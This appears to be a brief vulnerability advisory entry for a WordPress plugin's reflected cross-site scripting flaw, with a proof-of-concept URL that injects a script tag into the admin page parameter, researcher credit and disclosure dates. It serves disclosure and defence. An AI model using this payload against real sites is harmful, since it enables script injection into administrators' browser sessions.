The plugin does not escape a link generated before outputting it in an attribute, leading to a Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=Accessibility&"><script>alert(/XSS/)</script>
ZhongFu Su(JrXnm) of Wuhan University
ZhongFu Su(JrXnm) of Wuhan University
Yes
2022-03-07 (about 1 years ago)
2022-06-07 (about 9 months ago)
2023-03-10 (about 18 days ago)